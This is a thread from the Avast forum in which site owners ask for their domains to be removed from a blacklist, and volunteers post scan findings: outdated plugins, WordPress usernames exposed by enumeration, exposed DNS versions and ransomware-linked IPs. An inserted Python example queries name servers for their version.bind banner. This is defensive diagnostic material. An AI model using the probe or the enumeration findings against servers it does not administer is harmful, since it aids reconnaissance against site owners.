email-subscribers 3.2.9   latest release (3.3) Update required
http://www.icegram.com/
contact-form-7 4.7   latest release (4.8) Update required
https://contactform7.com/
Plugins are a source of many security vulnerabilities within WordPress installations, always keep them updated to the latest version available and check the developers plugin page for information about security related updates and fixes.

One jQuery library to be retired: http://retire.insecurity.today/#!/scan/fb2da25eae9ced5cfe5bbfb003dde551b1c6e3e311047136a01abb017fe07a1e

C+ status here: https://observatory.mozilla.org/analyze.html?host=kel.mn  see: recommendations.

DNS issues with CloudFlare: http://www.dnsinspect.com/kel.mn/10127457

Just wait for an Avast Team Member to come up with a verdict, and tell us why it has been blocked.
I think it is the use of problematic -zoho.mail, categorization vulnerabilities, but let's wait and see.

polonus (volunteer website security analyst and website error-hunter)

Hey, thanks for the detailed report!

I guess that it was blacklisted long time ago when I was using afraid.org DNS service, but let's wait and see.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on June 13, 2017, 02:52:42 PM
Hi there Kelemen,

Well the problem comes indeed with free afraid dot org service, when you never know your sub-domains are/stay really yours.
You have steered away from afraid dot org, you might be good to go.

Just pay attention to the recommendations to make the site a tiny bit more secure,
and wait for an Avast Team Member to come and unblock.

We here are just volunteers with relevant knowledge. Avast Team Members do the unblocking,
sometimes even as quick as with a next upcoming streaming update,

Greetings,

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Milos on June 14, 2017, 10:56:07 AM
Hello,
domain "kel.mn" was unblocked yesterday 18:49 CET.

Milos
Title: Re: How to remove my website from your blacklist?
Post by: sagyaron on June 18, 2017, 09:48:56 PM
Hi Milos
My website is also blocked, sagiagency[.]com, I've changed server and DNS, I would be happy if you could please help me unblock the website.
thank you in advance.
Yaron
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on June 18, 2017, 10:07:16 PM
Blacklisted :
http://www.urlvoid.com/scan/sagiagency.com/
https://www.virustotal.com/en/url/ecd8d24caf74c1b4d8ee5accd64f25a678a4c21c008422a9a8cedf624c79cab3/analysis/1497815768/
https://www.virustotal.com/en/ip-address/185.37.151.213/information/
http://urlquery.net/report.php?id=1497813674834

Outdated software used :
https://sitecheck.sucuri.net/results/www.sagiagency.com

contact-form-7 4.6   latest release (4.8) Update required
Warning User Enumeration is possible
ID   User    Login
1   sagyaron   sagyaron
2   superuser   superuser

2 vulnerable libraries detected
http://retire.insecurity.today/#!/scan/ef13b8610a3f7934bb2b75e2a362ddafabc27ffbb4470434eb7822d90c8f0f25
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on June 18, 2017, 10:09:39 PM
You can report a URL here: https://www.avast.com/report-a-url.php
Title: Re: How to remove my website from your blacklist?
Post by: polonus on June 18, 2017, 10:30:38 PM
Hi Yaron, good day

Adding to what Eddy so aptly reported,

It is not only avast that blocks, it is also blocked by Bitdefender's TrafficLight.

DNS issue: Name Servers Versions
WARNING: Name servers software versions are exposed:
188.166.127.243: "9.9.4-RedHat-9.9.4-29.el7_2.3"
212.129.26.2: "9.9.4-RedHat-9.9.4-29.el7_2.3"

Exposing name server's versions may be risky, when a new vulnerability is found your name servers may be automatically exploited by script kiddies until you patch the system. Take this up with the hoster of the name server(s).

Let's Encrypt Authority X3 certificate is installed correctly, same origin aka sri-hashes also properly created.

What was flagged, the counter adware, has now not been detected, wait for an Avast Team Member to give the definite verdict.

We are just volunteers with relevant knowledge, but only Avast Team Members can unblock.
Wait until the coming Monday, when one is to appear here.

polonus (volunteer website security analyst and website error-hunter)
All the best
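An added example, not part of the original post and not the DNS scanner's code: the version banner quoted above is what a name server returns for a `version.bind` TXT query in the CHAOS class, and this sketch builds that query, parses the reply, and flags banners that still contain a release number. Function names are hypothetical; the exposed banner is the one quoted in the post, and the "not disclosed" reply is constructed.

```python
import re
import socket
import struct

TYPE_TXT, CLASS_CH = 16, 3          # version.bind is a TXT record in the CHAOS class
VERSION_LIKE = re.compile(r"\d+\.\d+")


def encode_name(name):
    """Encode a domain name as length-prefixed DNS labels."""
    out = b""
    for label in name.strip(".").split("."):
        raw = label.encode("ascii")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_version_query(txid=0x5642):
    """DNS query message asking for version.bind CH TXT."""
    header = struct.pack("!6H", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name("version.bind") + struct.pack("!2H", TYPE_TXT, CLASS_CH)


def _skip_name(msg, off):
    """Offset just past the (possibly compressed) name starting at off."""
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:   # compression pointer: two bytes, ends the name
            return off + 2
        off += 1
        if length == 0:
            return off
        off += length


def parse_version_reply(msg):
    """Return the TXT strings of every CH TXT answer in a DNS reply."""
    if len(msg) < 12:
        raise ValueError("truncated DNS header")
    _txid, _flags, qdcount, ancount, _ns, _ar = struct.unpack("!6H", msg[:12])
    off = 12
    for _ in range(qdcount):
        off = _skip_name(msg, off) + 4          # skip QTYPE and QCLASS
    strings = []
    for _ in range(ancount):
        off = _skip_name(msg, off)
        rtype, rclass, _ttl, rdlen = struct.unpack("!2HIH", msg[off:off + 10])
        off += 10
        rdata, off = msg[off:off + rdlen], off + rdlen
        if (rtype, rclass) == (TYPE_TXT, CLASS_CH):
            i = 0
            while i < len(rdata):               # TXT rdata: length-prefixed strings
                n = rdata[i]
                strings.append(rdata[i + 1:i + 1 + n].decode("ascii", "replace"))
                i += 1 + n
    return strings


def discloses_version(banner):
    """True when the banner still contains something shaped like a release number."""
    return bool(VERSION_LIKE.search(banner))


def make_reply(query, banner):
    """Constructed reply for offline checks: echoes the question, adds one TXT answer."""
    header = query[:2] + struct.pack("!5H", 0x8400, 1, 1, 0, 0)
    raw = banner.encode("ascii")
    rdata = bytes([len(raw)]) + raw
    answer = b"\xc0\x0c" + struct.pack("!2HIH", TYPE_TXT, CLASS_CH, 0, len(rdata)) + rdata
    return header + query[12:] + answer


def check_own_server(server, timeout=3.0):
    """Ask one of your own name servers over UDP/53 and report each banner."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_version_query(), (server, 53))
        banners = parse_version_reply(s.recvfrom(4096)[0])
    return [(b, discloses_version(b)) for b in banners]
```

On BIND the returned string is set by the `version` statement in the `options` block of named.conf, so the hoster can replace the banner without changing anything else.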
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on June 19, 2017, 08:58:32 AM
I have removed sagiagency[.]com from our blacklist ;)!
Title: Re: How to remove my website from your blacklist?
Post by: D=a= on June 23, 2017, 12:41:36 PM
Hi there,

our website deigualaigual[.]net and its subdomains have passed the tests of urlvoid, pingdom, virustotal, with the result that the web and its subdomains are clean, so we need it to be removed from the blacklist of avast. Thanks.

Regards.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on June 23, 2017, 12:48:36 PM
Quote
Hi there,

our website deigualaigual[.]net and its subdomains have passed the tests of urlvoid, pingdom, virustotal, with the result that the web and its subdomains are clean, so we need it to be removed from the blacklist of avast. Thanks.

Regards.
probably because you are using afraid.org free host
Nameservers: ns2.afraid.org, ns3.afraid.org, ns4.afraid.org, ns1.afraid.org


Title: Re: How to remove my website from your blacklist?
Post by: Asyn on June 23, 2017, 12:50:57 PM
Also see: http://zulu.zscaler.com/submission/show/4a3498bcb2f07a658bf777af210ab50e-1498214777
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on June 23, 2017, 12:58:18 PM
VirusTotal does not scan websites.

You are linking to a blacklisted website.
You are using afraid.org as nameserver.
https://forum.avast.com/?topic=148018.msg1075293#msg1075293

Wordpress issue :
Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.
ID   User    Login
1   None   jomra
2   None   ruben-i-kotler

Vulnerable libraries that need to be retired :
http://retire.insecurity.today/#!/scan/eee01fc5ba9f903547544199bf66601c40a4bd50c299721d49984a7accdb27f4
http://zulu.zscaler.com/submission/show/4a3498bcb2f07a658bf777af210ab50e-1498214764
Title: Re: How to remove my website from your blacklist?
Post by: polonus on June 23, 2017, 04:29:12 PM
Using a free afraid dot org account means a clear security risk as you will not know who is the owner of your sub-domain(s)?
That is the risk.

For the script risks given by zulu.zscaler scan result flagged, see: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fwww.deigualaigual.net%2Fwp-includes%2Fjs%2Fjquery%2Fjquery.js%3Fver%3D1.12.4
with errors:
Quote
error: line:5: SyntaxError: missing ) in parenthetical:
          error: line:5: .events)n.removeEvent(b,d,e.handle);b.removeAttribute(n.expando)}"script"===c&&b.text!==a.text?(Da(b).text=a.text,Ea(b)):"object"===c?(b.parentNode&&(b.outerHTML=a.outerHTML),l.html5Clone&&a.innerHTML&&!n.trim(b.innerHTML)&&(b.innerHTML=a.innerHTML)):
          error: line:5:
means the output of the server is invalid, post action not well formed.
Yep, da old javascript it could often be a bitch!
Blocked for me by uMatrix external script, see: https://urlscan.io/result/cd26875b-61df-4fcf-a304-fc6ce2f023d3#summary
Also see api-scan for external script: https://urlscan.io/api/v1/result/cd26875b-61df-4fcf-a304-fc6ce2f023d3/

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: miroslav.braikov on July 16, 2017, 11:16:46 PM
hxxp://vic[.]bg is reported as infected, but it is not
i've checked it with
https://sitecheck.sucuri.net/results/vic.bg/

what i have to do in order to be removed of your blacklist?
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 17, 2017, 12:02:33 AM
Hi miroslav.braikov,

Wait for an avast team member to give the final verdict and eventually unblock.
We are volunteers with relevant knowledge but cannot unblock as that is for avast team members.

Still the security of your website could be somewhat improved.
Re: http://www.dnsinspect.com/vic.bg/10155323  (stealthed name servers and Found mail servers with inconsistent reverse DNS entries). 
Re: https://aw-snap.info/file-viewer/?protocol=not-secure&tgt=vic.bg%2F&ref_sel=GSP2&ua_sel=ff&fs=1   seems OK.
Server maybe Mute Remote vulnerable.
Vulnerable bootstrap library to be retired: http://retire.insecurity.today/#!/scan/e610cc95b2d8cce37b099473066cbad28eba676d4bdc100863126752c60f1f0e
F-status and see recommendations: https://observatory.mozilla.org/analyze.html?host=vic.bg

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 18, 2017, 10:23:56 AM
Hi,
There was a false positive on a favicon.ico file (hxxp://vic[.]bg/imgs/vicBG.ico)... I have disabled the detection, it should be okay in the next VPS, but you might want to remove the .ico file to be able to access it before the update rolls out ;)
Title: Re: How to remove my website from your blacklist?
Post by: glauciojcmachado on July 31, 2017, 02:16:57 AM
I also have this problem. There is nothing wrong with my site, but all avast users complain. How can it be removed from the blacklist?
https://www.gravityscan.com/verify/c49dbb2d2e31f4a2fd732050addb2af599494b1383a97a2eaee2a8a28629ebda
https://www.google.com/transparencyreport/safebrowsing/diagnostic/?hl=pt-BR#url=universodovinil.com.br
Thank you for your attention
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on July 31, 2017, 04:59:42 AM
-> https://sitecheck.sucuri.net/results/universodovinil.com.br
-> http://zulu.zscaler.com/submission/show/b3b6c1cc51286a8de461c18096f06088-1501469570
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 31, 2017, 09:02:55 AM
universodovinil[.]com.br was blocked because it was a router CSRF source. I am now unblocking the domain, but note that it will be automatically blocked again if there is another attack from it.
Title: Re: How to remove my website from your blacklist?
Post by: Michał89 on August 30, 2017, 11:03:13 AM
Hi

All my malicious links have been removed from http://maricom[.]pl and WordPress has been reinstalled and updated. Can you remove my site from your blacklist?
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on August 30, 2017, 12:32:30 PM
You can report a URL here: https://www.avast.com/report-a-url.php
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on August 30, 2017, 01:53:45 PM
http://retire.insecurity.today/#!/scan/0cbca75fe4cf585d00203d22f34392cff8ac394a581a73aa19c5f0ef05cdfd73
Title: Re: How to remove my website from your blacklist?
Post by: Michał89 on August 30, 2017, 03:20:29 PM
jquery also updated:)

http://retire.insecurity.today/#!/scan/1ae88029b30b0f35317ceb553870172a38e5b0926e47145cbbaef8454a1374f9
Title: Re: How to remove my website from your blacklist?
Post by: Stareclipse on August 30, 2017, 09:35:10 PM
Hello, our website Asrcargo.ru is blocked again, even though it has been broken only once in 2016. Since that time the site was blocked by Avast several times without any reason, so I write messages every month or two.

The site is absolutely clean, confirmed by Google Search Console, access is under 2 factor authentication, no malware, scripts or viruses detected. Please check and delete our domain from your database.
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on August 30, 2017, 09:45:50 PM

Report a URL
https://www.avast.com/report-a-url.php
Title: Re: How to remove my website from your blacklist?
Post by: Stareclipse on August 30, 2017, 10:00:29 PM
Many thanks!! I searched for this page for such a long time!


Report a URL
https://www.avast.com/report-a-url.php
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on August 30, 2017, 10:20:32 PM
You're welcome. :)
Title: Re: How to remove my website from your blacklist?
Post by: polonus on August 30, 2017, 10:31:10 PM
The IP your site is on delivers/-ed/has launched ransomware: https://ransomwaretracker.abuse.ch/ip/95.213.196.126/
and the abuse was performed from that domain. McAfee also blocks your site, so it is not only avast....

See the anomalies in the response http://www.rexswain.com/cgi-bin/httpview.cgi?url=http://asrcargo.ru&uag=Mozilla/5.0+(Windows+NT+6.3%3B+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.113+Safari/537.36&ref=http://www.rexswain.com/httpview.html&aen=&req=GET&ver=1.1&fmt=AUTO
-> https://github.com/xDrivenDevelopment/v8Reader/commit/955c22d5522b37c982d4212fe04da5c153e45eed.patch
- http://toolbar.netcraft.com/site_report?url=http://s12.default-host.net
Quote
Сайт s12.default-host.net не настроен на сервере

Сайт s12.default-host.net не настроен на сервере хостинга.

Адресная запись домена ссылается на наш сервер, но этот сайт не обслуживается.
Если Вы недавно добавили сайт в панель управления - подождите 15 минут и ваш сайт начнет работать.

Server s12
Quote
The site s12.default-host.net is not configured on the server

The site s12.default-host.net is not configured on the hosting server.

The domain address is linked to our server, but this site is not served.
If you recently added a site to the control panel - wait 15 minutes and your site will start working.

Server s12

When your site/the server it is on, is no longer being misused/abused,
wait for an avast team member to give a final verdict, and eventually unblock or continue to block...

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on August 30, 2017, 10:46:07 PM
The IP your site is on delivers/-ed/has launched ransomware: https://ransomwaretracker.abuse.ch/ip/95.213.196.126/
and the abuse was performed from that domain. McAfee also blocks your site, so it is not only avast....

See the anomalies in the response http://www.rexswain.com/cgi-bin/httpview.cgi?url=http://asrcargo.ru&uag=Mozilla/5.0+(Windows+NT+6.3%3B+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.113+Safari/537.36&ref=http://www.rexswain.com/httpview.html&aen=&req=GET&ver=1.1&fmt=AUTO
-> https://github.com/xDrivenDevelopment/v8Reader/commit/955c22d5522b37c982d4212fe04da5c153e45eed.patch
- http://toolbar.netcraft.com/site_report?url=http://s12.default-host.net
Quote
Сайт s12.default-host.net не настроен на сервере

Сайт s12.default-host.net не настроен на сервере хостинга.

Адресная запись домена ссылается на наш сервер, но этот сайт не обслуживается.
Если Вы недавно добавили сайт в панель управления - подождите 15 минут и ваш сайт начнет работать.

Server s12
Quote
The site s12.default-host.net is not configured on the server

The site s12.default-host.net is not configured on the hosting server.

The domain address is linked to our server, but this site is not served.
If you recently added a site to the control panel - wait 15 minutes and your site will start working.

Server s12

When your site/the server it is on, is no longer being misused/abused,
wait for an avast team member to give a final verdict, and eventually unblock or continue to block...

polonus (volunteer website security analyst and website error-hunter)
Precisely why I passed along the link so that once the site is reported to Avast, they will make the final decision.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on August 30, 2017, 11:31:39 PM
Rightly so, and I hope an avast team member will come here and tell whether the site is fit for unblocking.
Also the site owner has to address McAfee as it has been blocked there as well.
Whether the Locky ransomware delivery (6 times reported during the previous year) was accidental
and beyond the capability of site-owner and domain hoster alike should also be taken into consideration.

At least these external elements have been found to be benign:
External Elements

URL   RISK
-http://asrholdings.com.hk/freight-forwarding-   Benign
-http://tutmee.ru   Benign
-http://www.carlsberg.com   Benign
-http://asrholdings.com.hk/general-sales-agent   Benign
-http://www.hkex.com.hk/eng/market/partcir/seh   Benign

But the site is still being blacklisted on mnemonic secure dns here verified 2017-08-30:
https://urlquery.net/report/40141bdc-3ba7-4af1-9da1-c2d06c7945d2

See issues here: https://threatintelligenceplatform.com/report/asrcargo.ru/uGmw6qL5wm
Also blacklisted by Virus Total suspicious URLs analyser   Failed   Status: dangerous
BitDefender - malware site
Trustwave - malicious site
ESET - malware site
AutoShun - malicious site

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on August 31, 2017, 01:00:27 PM
Quote
Since that time the site was blocked by Avast several times without any reasons
Stareclipse, get the clue.
avast doesn't block sites/servers/IPs without a reason.
And if you look at the reports from Polonus, you will see it is a legitimate block and it will stay (or get blocked again) if the owner doesn't improve the security and keep spreading Locky.

Get dedicated hosting at a trusted hoster that does take security seriously.
Title: Re: How to remove my website from your blacklist?
Post by: cdnsupport on August 31, 2017, 01:31:21 PM
Hi,

I am the support manager from holacdn.com, one of our urls has been blocked by you, can you please remove it:
http://cdn.worldnewsfeed.org/uiadfix.js

I checked the following sites:
https://www.virustotal.com/#/url/03230211cbb4e786082b3a107b2a3db52abc16ad75c6ccc4f10bbb02619ab1c4/detection
https://zulu.zscaler.com/submission/ba98be06-836b-4c44-adba-56448602813f
https://tools.pingdom.com/#!/iC1nQ/http://cdn.worldnewsfeed.org/uiadfix.js

all with no risks or with response code 200 OK
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on August 31, 2017, 01:34:40 PM
Website:    cdn.worldnewsfeed.org/uiadfix.js
Status:    Unable to properly scan your site. Content not found.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on August 31, 2017, 01:38:28 PM
Why giving a link to a javascript and not just the domain ?
Site is having issues, avast is not blocking it.
Contact the admin and set him/her to work.

Edit:
according to the domain registration, it looks like worldnewsfeed isn't even owned by holaspark.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on August 31, 2017, 02:02:32 PM
Even with an external scan at https://aw-snap.info/file-viewer/
avast webshield flags an alert for JS?Agent-DEZ detection, probably a heritage from AVG's:
http://www.avgthreatlabs.com/en-ww/virus-and-malware-information/info/js-agent/

Consider: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fcdn.worldnewsfeed.org%2Fuiadfix.js

You failed the lame nameserver check  8) -> toolbar.netcraft.com/site_report?url=http://ns-849.awsdns-42.net (10 red out of 10).

With a javascript unpacker check I get suspicious behavior:
Quote
All Malicious or Suspicious Elements of Submission

suspicious: maxruntime exceeded 10 seconds (incomplete) 0 bytes
-cdn.worldnewsfeed.org/uiadfix.js benign
[nothing detected] -cdn.worldnewsfeed.org/uiadfix.js
     status: (referer=hxtp:/www.ask.com/web?q=puppies)saved 1345218 bytes e5e1ed0ed3bd9e64cc865b605693044e77626fc4
     info: [decodingLevel=0] found JavaScript
     suspicious: maxruntime exceeded 10 seconds (incomplete) 0 bytes
     file: e5e1ed0ed3bd9e64cc865b605693044e77626fc4: 1345218 bytes
     file: 5adcc5c1c33a385e26478e6a9e3a11b4b0d32267: 1345436 bytes
     file: 2b56904e698433c1650a8e460f0cc7ae654c2a5f: 1345442 bytes
     file: 311f73081506339fa3ef328f7aaa3ccf57fbe3d3: 1345651 bytes
     file: ac752db2251a8125a3c169614d0aa6ffa5536e0d: 1345843 bytes
     file: be701fb6acd08d5943a30eefaab4813cca4d3a46: 1345557 bytes
     file: db7de399e2936a54af4098051f0f97fbbd49a76c: 1345681 bytes

Whatever it may be, final verdict will come from an avast team member as we here are just volunteers with relevant knowledge, but cannot unblock, remember the IP has been reported to several sources as previously malicious: https://otx.alienvault.com/indicator/ip/205.185.216.10 and for various abuse just as recently as a week ago, see here:
https://www.abuseipdb.com/check/205.185.216.10  (abused, misused server at amazon - IDS alerts for a.o. ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) (release dot xender dot com and others that share that same IP...)

F-Grade status and recommendations: https://observatory.mozilla.org/analyze.html?host=cdn.worldnewsfeed.org

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: rohmanhm on September 11, 2017, 04:53:26 AM
I just opened a ticket. https://support.avast.com/support/tickets/948938

Please release my site (news-health.net) from your blacklist. I just owned this domain.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on September 11, 2017, 05:41:21 AM
https://urlquery.net/report/a02a17ab-c905-42fc-bc9a-eef59212793b
https://sitecheck.sucuri.net/results/news-health.net

Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.
ID   User            Login
1   rmasy   rmasy
2              None

Warning Directory Indexing Enabled

http://retire.insecurity.today/#!/scan/df99ab820036f40d8ebf8792ac302c85cc93b03dbd17c080dd1d32ea759e1a75
Title: Re: How to remove my website from your blacklist?
Post by: rohmanhm on September 11, 2017, 08:50:59 AM
https://urlquery.net/report/a02a17ab-c905-42fc-bc9a-eef59212793b
https://sitecheck.sucuri.net/results/news-health.net

Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.
ID   User            Login
1   rmasy   rmasy
2              None

Warning Directory Indexing Enabled

http://retire.insecurity.today/#!/scan/df99ab820036f40d8ebf8792ac302c85cc93b03dbd17c080dd1d32ea759e1a75

I just installed wordpress cms. Should I remove wordpress to get my site safe?
Any advice?

I still don't have any idea why my site is blocklisted by Avast.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on September 11, 2017, 08:53:27 AM
If you have to ask if you should remove Wordpress to make the site safer, you shouldn't be running a website at all or hire a real admin who knows what he/she is doing.
Title: Re: How to remove my website from your blacklist?
Post by: LukasJ on September 11, 2017, 09:07:06 AM
Hi guys,
URL news-health.net has been removed from blacklist.

Lukáš
Title: Re: How to remove my website from your blacklist?
Post by: rohmanhm on September 11, 2017, 09:28:40 AM
Hi guys,
URL news-health.net has been removed from blacklist.

Lukáš

Thanks Lucas. Now I can focus on my content
Title: Re: How to remove my website from your blacklist?
Post by: Subi on September 11, 2017, 02:14:48 PM
Hello Eddy,

Could you help me, my server 213.181.208.128 is full of wp sites, all of them blocked by Avast, because: URL:MAL

I made an IP check:
https://www.virustotal.com/en/ip-address/213.181.208.128/information/

If I check only one site (for example), it says it's clean:
https://sitecheck.sucuri.net/results/femesfafehergyarmat.hu

what is the problem with my server?

thx!
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on September 11, 2017, 04:53:43 PM
Subi,

without looking any further, I already see that your problem is the use of shared hosting.
Step away from it and get dedicated hosting.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on September 11, 2017, 09:54:56 PM
IP blacklisted by -213.181.208.128 blacklisted by 2 websites
1 Von Hamburg bis Hawaii
2 CH3man's Web

213.181.208.128/cgi-sys/defaultwebpage.cgi   is blacklisted for PHISHING: http://urlquery.net/report/ba047b99-2ad9-4f5d-98a6-5de122844094  &  http://urlquery.net/report/1156f16c-3f5f-449e-9f29-521e46f865d0
Dangerous as Google Safebrowsing blocks it as misleading website...phishing recently detected.
See: http://toolbar.netcraft.com/site_report?url=http://213.181.208.128

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: Subi on September 12, 2017, 01:26:52 PM
213.181.208.128/cgi-sys/defaultwebpage.cgi
213.181.208.128/img-sys/powered_by_cpanel.svg

Hm, so the 404 page and the cpanel logo is phishing... that's why all my hosted sites are blocked by you???

these are the same page of my server:
this is not phishing: http://hosting.aranyoldalak.hu/cgi-sys/defaultwebpage.cgi
nor this: http://hosting.mtt.hu/cgi-sys/defaultwebpage.cgi
this is phishing: http://213.181.208.128/cgi-sys/defaultwebpage.cgi

As I see, these pages are NOT phishing, and I don't know what could I do to remove from the blacklists...
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on September 12, 2017, 01:29:37 PM
Did you even read my last post ?
Title: Re: How to remove my website from your blacklist?
Post by: Subi on September 12, 2017, 01:35:14 PM
Hi,

oh, the shared server is the reason why all the sites are blocked. ok. understand.

and I think I could discuss the blacklist sites for the reason of the listing.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on September 12, 2017, 01:36:55 PM
Get the clue, it is not the domain that is blacklisted but the IP.
There is no discussion possible/needed.
There are a lot of malicious sites there.
Title: Re: How to remove my website from your blacklist?
Post by: Subi on September 12, 2017, 01:39:29 PM
OK, nothing is perfect :)

thanks a lot! i think i have some work.

bye
Title: Re: How to remove my website from your blacklist?
Post by: WuqiYin on October 24, 2017, 10:45:16 AM
Hi, Eddy!

Could you help me to check this link? Just one link has been blocked with URL:MAL.
The link is http://update.youngzsoft.com/ccboot/update/ccbootsetup.exe.
Other site under update.youngzsoft.com can work normal.

I checked the link in virustotal in these ways before:
1. https://www.virustotal.com/#/url/b9a923f8b3a6488e075d9a0f432332b6ebefa649556d432a9701e0f1cb68a526/detection
2. Upload exe file to virustotal to check.
It shows clean in both of these ways.

Could you help to analyze the reason? Thank you very much!
Title: Re: How to remove my website from your blacklist?
Post by: polonus on October 24, 2017, 12:00:10 PM
Hi WuqiYin,

Probably blocked because of an older cloud IP blacklisting.

No recent alert here: http://urlquery.net/report/f2e0119e-58bd-47cc-a0e0-dec628808ea8

Or to do with the executable, ET POLICY PE EXE or DLL Windows file download HTTP alerted, read:
http://www.solvusoft.com/en/files/error-virus-removal/exe/windows/youngzsoft-inc/ccboot/ccboot-exe/

In both cases we have to wait for an avast team member to arrive here and give a final verdict,
as we are just volunteers with relevant knowledge, but cannot unblock,

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: Milos on October 24, 2017, 03:49:36 PM
Hello,
URL was unblocked.

Milos
Title: Re: How to remove my website from your blacklist?
Post by: WuqiYin on October 25, 2017, 03:11:52 AM
Hi, Polonus and Milos!

Thank you for your reply!

I have sent an email to virus@avast.com before and posted a URL on the avast support page.
They replied me and told me that they detected that file again and the file is clean now.
So, they already removed it from avast block list.

Thank you very much!
Title: Re: How to remove my website from your blacklist?
Post by: Leandro150 on January 20, 2018, 11:46:42 PM
Hi, AVAST is detecting my personal web, and blocking the access. It only said URL:MAL.

I checked my Wordpress site and don't see anything wrong. Can you remove it from the blacklist or tell me what the problem is?

https:///ingeniarting.com

thanks
Title: Re: How to remove my website from your blacklist?
Post by: DavidR on January 20, 2018, 11:53:14 PM
Hi, AVAST is detecting my personal web, and blocking the access. It only said URL:MAL.

I checked my Wordpress site and don't see anything wrong. Can you remove it from the blacklist or tell me what the problem is?

https:///ingeniarting.com

URL:MAL is usually an indication that your site has an external link to a malicious site/url, check your external links to ensure they are meant to be there.

Title: Re: How to remove my website from your blacklist?
Post by: Leandro150 on January 21, 2018, 06:11:41 PM


URL:MAL is usually an indication that your site has an external link to a malicious site/url, check your external links to ensure they are meant to be there.

My site doesn't have any external links at all. It is a very small web site.
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on January 21, 2018, 06:15:45 PM

Submitting a URL:
https://www.avast.com/report-a-url.php

Title: Re: How to remove my website from your blacklist?
Post by: polonus on January 21, 2018, 08:17:12 PM
Check your website here: hackertarget.com/wordpress-security-scan/
and here: hackertarget.com/wordpress-security-scan/

Wait for an avast team member to give a final verdict on the potential insecurity of the website.

Only avast team members can come to unblock, as we are users with relevant knowledge,
but cannot do that.

Your IP was the possible reason for the domain of the website being blocked: https://ransomwaretracker.abuse.ch/ip/192.0.78.24/

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on January 22, 2018, 08:51:41 AM
Hi, I am unblocking the IP, 160.153.96.194, which was likely to be the cause. Do let me know if you have any trouble from now on.
Title: Re: How to remove my website from your blacklist?
Post by: Leandro150 on January 22, 2018, 12:30:31 PM
Thank you very much.
Title: Re: How to remove my website from your blacklist?
Post by: optimierung on January 24, 2018, 06:44:15 PM
Hi there,
our Website gartenfit[.]com has been set to a warning URL:Mal. The support only told me it would be due to lack of compliance with your clean software policy. Unfortunately I cannot find the reason behind the whole Avast Clean Guidelines.
There had been a problem caused by a hacker, but it should be fixed in between.
Could you please delete the site from the Blacklist?

best regards
Karsten
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on January 24, 2018, 07:12:25 PM

Submitting a URL:
https://www.avast.com/report-a-url.php

Title: Re: How to remove my website from your blacklist?
Post by: polonus on January 24, 2018, 09:50:56 PM
Hi optimierung,

See where your site could be better "optimalisiert" security wise: https://observatory.mozilla.org/analyze.html?host=www.gartenfit.com
F-grade status and recommendations.
Vulnerable jQuery library detected: http://retire.insecurity.today/#!/scan/9ac0a73693cbf939cab687721bc6e4122fb7761db254613ec07876b82614007c

You share your IP with an abuse IP, that is the reason your domain probably became blocked: https://ransomwaretracker.abuse.ch/ip/81.169.145.82/

Wait for an Avast Team Member to give the final verdict and eventually exclude/unblock your domain for that IP.
We here are just volunteers with relevant knowledge, but only Avast Team Members may unblock.

Kind regards,

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on January 25, 2018, 06:36:00 AM
The reason was indeed having been hacked: https://www.phishtank.com/phish_detail.php?phish_id=5439072
I am unblocking the domain now and hope that you made sure that it will not happen in the future :)!
Title: Re: How to remove my website from your blacklist?
Post by: optimierung on January 26, 2018, 09:35:19 AM
Works again. Thank you a lot.
Title: Re: How to remove my website from your blacklist?
Post by: admin232 on April 04, 2018, 07:16:34 PM
Hello,

Our url d3ipinc.com has been blocked by your server, can you please remove it:

https://www.virustotal.com/#/url/b0fff46e99f3ae4788becdcd9759e0b99dfe36d76e11129d99b93e76e9ef0a64/detection

